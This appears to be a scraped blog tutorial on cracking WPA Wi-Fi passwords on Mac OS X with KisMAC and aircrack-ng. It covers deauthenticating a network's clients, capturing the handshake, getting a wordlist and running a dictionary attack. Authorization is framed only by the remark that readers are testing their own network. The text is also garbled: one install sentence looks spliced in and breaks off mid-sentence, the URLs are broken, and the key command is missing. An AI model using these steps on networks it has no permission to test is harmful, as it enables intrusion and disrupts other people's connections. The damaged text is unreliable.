Cracking WPA Networks with KisMAC+aircrack-ng on Mac OS X Lion. UPDATE 12-5-12: Thanks to a reader (see comments below), I've gotten my hands on a version of KisMAC that works on Mac OS X Mountain Lion! While it may be a beta version, it does at least run and collect unique IVs from my Airport Extreme card, and I'm able to use the data in aircrack-ng.
Install AirCrack - ng on Mac OSX 10.8 Mountain Lion easily. Installing Xcode, Xcode Command Line tools and Macports is all that's required for AirCrack - ng to.
Download it here: https://s3. amazonaws.
com/kismac2/KisMac2. zip. If you read my last post about cracking WEP networks, you're probably ready to take it to the next step -- WPA. While cracking WEP works 100% of the time, cracking WPA is much more difficult. I've read somewhere that about 25% of WPA networks are cracked. Cracking WEP works by collecting enough information about the key and then reconstructing it.
With WPA, you must start with a key and see if it fits the "handshake". Therefore, you need an entire dictionary of pass phrases to test against. The secret to cracking WPA is having a good dictionary, and the pass phrase you're trying to crack MUST be in the dictionary you're using. Luckily, you're only interested in cracking your own WPA network, so you already know the key. The same tools are used to crack WPA, so follow my previous post to get set up. Essentially, you need KisMAC and aircrack-ng.
Here's how we'll crack WPA:. Deauthenticate the network.
Capture a handshake. Get a dictionary. Run a dictionary attack using the captured handshake.
Deauthenticating the network. Deauthenticating a network requires a card that supports packet injection (the Airport Extreme card does not ).
If you don't have a card, you could skip this step, but you might have to wait a long time to capture a handshake. Let's get started. Fire up KisMAC and set up your preferences for your card(s) and dumps (see previous post). Start scanning and select the network you want to crack.
Click Network->Deauthenticate. Deauthenticating essentially disconnects devices on the network and forces them to reconnect. Capture a handshake. If you're able to deauthenticate, in the next few moments (less than a minute), you should see the little light go from red to green which means you've captured a handshake. If you can't deauthenticate, you'll just have to wait for a device on the network to connect. Get a dictionary. There are tons of dictionaries out there.
I haven't done a lot of experimentation, but I've found moderate success with ftp://ftp. openwall. com/pub/wordlists/ and using the "all. gz" file. Aircrack-ng has a good wiki page here.
Run a dictionary attack. Now it's time to use our dictionary and crack the network. Open up terminal and type:. Aircrack-ng should detect the handshake in the dumps and start testing pass phrases. Once aircrack-ng is running, all you can do is wait. You might wait 5 minutes, or 5 years! The network I tested on took about 2. 5 hours and 9 million attempts before finding the right key.
If you know the key, make sure to put it in the dictionary for testing purposes.